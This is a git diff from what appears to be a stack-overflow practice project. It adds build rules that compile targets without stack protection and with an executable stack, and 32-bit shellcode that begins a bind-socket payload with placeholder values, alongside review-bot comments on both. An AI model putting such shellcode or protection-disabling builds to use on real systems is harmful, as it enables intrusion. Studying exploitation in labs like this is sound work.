-rw-r--r--.gitignore1
-rw-r--r--Makefile9
-rw-r--r--shellcode/socket.asm20
3 files changed, 24 insertions, 6 deletions
diff --git a/.gitignore b/.gitignore
index 441caf0..ad10a98 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,4 @@
+*.o
overflow
overflow_tcp
sc-test
diff --git a/Makefile b/Makefile
index 250d8df..7462d29 100644
--- a/Makefile
+++ b/Makefile
@@ -3,9 +3,10 @@ CC := gcc
STRIP := strip
CFLAGS = -Wall -g
OCFLAGS = -m32 -mpreferred-stack-boundary=2 -z execstack -fno-stack-protector
-TARGETS = $(patsubst %.c,%.o,$(wildcard *.c))
+SOURCES = $(wildcard *.c)
+TARGETS = $(patsubst %.c,%.o,$(SOURCES))
-all: shellcode $(TARGETS) post-build
+all: $(SOURCES) $(TARGETS) shellcode post-build
shellcode:
make -f shellcode/Makefile SUBDIR=shellcode
@@ -28,9 +29,11 @@ disable-prot:
%.o : %.c
$(CC) $(CFLAGS) $(OCFLAGS) -o $(patsubst %.o,%,$@) $<
+ ln -s $< $@
clean:
$(RM) -f $(patsubst %.o,%,$(TARGETS))
+ $(RM) -f $(TARGETS)
make -f shellcode/Makefile SUBDIR=shellcode clean
-.PHONY: shellcode all clean
+.PHONY: shellcode clean
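Review bot: The added `ln -s $< $@` in the `%.o : %.c` rule makes `foo.o` a symlink to `foo.c`, and since make stats through the link the target always carries its own source's mtime, so an edited source never looks newer and the binary is not rebuilt until the link is removed by hand; on any later run where it does fire, `ln -s` also fails because the link already exists. A plain stamp, `touch $@`, gives the target a timestamp newer than the source and is idempotent, though the cleaner fix is to make the binary itself the target (`%: %.c`) instead of a fake `.o`. Dropping `all` from `.PHONY` on the last line is a regression: `all` produces no file, and a stray file of that name would turn `make` into a no-op, so keep `.PHONY: shellcode all clean`. The `-f` on the new `$(RM) -f $(TARGETS)` line is redundant since `$(RM)` already expands to `rm -f`.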
diff --git a/shellcode/socket.asm b/shellcode/socket.asm
index e5b1e9d..731383f 100644
--- a/shellcode/socket.asm
+++ b/shellcode/socket.asm
@@ -1,13 +1,27 @@
BITS 32
-; zero out eax
-xor eax,eax
; socket()
+xor eax,eax ; zero out eax
push eax ; push 0x0 on the stack: arg3(protocol) -> 0
mov ebx,0x01 ; socket sub-syscall: 0x01 -> socket()
push 0x01 ; socket type: 0x01 -> SOCK_STREAM
push 0x02 ; socket domain: 0x02 -> AF_INET
mov ecx,esp ; let ecx point to our structure above
-mov al,102 ; syscall 0x66 (socket())
+mov al,0x66 ; socketcall syscall 0x66
+int 0x80 ; let the kernel do the stuff
+
+; bind()
+mov edx,eax ; move socket descriptor (returned by socket()) to edx
+xor eax,eax ; zero out eax again
+push 0xBBBB ; push ip addr
+push 0x00AA ; push tcp port
+push 0x0002 ; sa_family -> AF_INET = 0x0002
+mov ecx,esp ; save stack pointer -> pointer to sockaddr struct
+push 0x12 ; arg3: socklen -> addrlen
+push ecx ; arg2: push pointer to sockaddr to the stack
+push edx ; arg1: push sockfd
+mov ecx,esp ; move stack pointer to reg (conform to socketcall)
+mov ebx,0x02 ; set socket subcall to 0x03 (bind)
+mov al,0x66 ; socketcall syscall
int 0x80 ; let the kernel do the stuff
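Review bot: The immediate and the comment disagree on the new line `mov ebx,0x02 ; set socket subcall to 0x03 (bind)`; one of the two is wrong, and a reader cannot tell from the line which value was intended, so the comment should state the value that is actually assembled. The constants on `push 0xBBBB ; push ip addr` and `push 0x00AA ; push tcp port` are placeholders, but the comments describe them as real fields; marking them as such, e.g. `; placeholder address, not a valid IPv4 value`, keeps a reader from taking them for a working default. The new `; bind()` block also never checks the return of the preceding `int 0x80`, so a failed socket() silently feeds an error code into edx as the descriptor; a comment noting that this is deliberate for size would help.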